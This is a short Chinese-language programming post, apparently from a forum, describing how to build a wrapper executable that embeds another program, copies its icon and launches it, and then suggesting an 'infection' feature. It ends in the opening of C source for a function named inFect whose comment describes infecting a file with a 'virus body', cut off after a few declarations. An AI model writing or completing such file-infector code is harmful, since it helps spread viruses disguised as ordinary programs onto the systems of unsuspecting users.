提示一点，一种最简单的方法是，自己做一个外壳程序(Shell)，然后将要运行的程序以某种方式放入到外壳程序中（比如以资源或者特定位置数据），而外壳程序可以抽取原可执行程序文件得图标，并可修改自己的图标与之相同。这样一来，经过修改的程序就是 外壳程序 + 原可执行程序（已作为数据存在于外壳程序中），运行后自然先启动外壳程序，你可以在其中加入一些权限判定的代码，通过验证后，外壳程序将自身中的真正可执行文件数据提取并运行。这里面的要求是，外壳程序必须用纯 WinAPI SDK 方式编写，以减少文件体积；外壳程序应当对写入自身的原可执行程序数据作加密处理，以防被窃取。你可以位外壳程序增加感染功能（不要做病毒哦……）等等。
　　
　　/****************************************************************************
　　Function Name : inFect
　　Function : 感染文件
　　Parement : char *strFile 文件名
　　char *strSource 病毒体
　　DWord dwSourceSize 病毒体长度
　　Return : if sUCcess return 1,else return 0;
　　*****************************************************************************/
　　int inFect(WIN32_FIND_DATA _lpFindFileData,char *strSource,DWORD dwSourceSize){
　　HANDLE hSearchFile=NULL;
　　DWORD dwSearchFileSize=0;
　　char VirusFlag[10]={'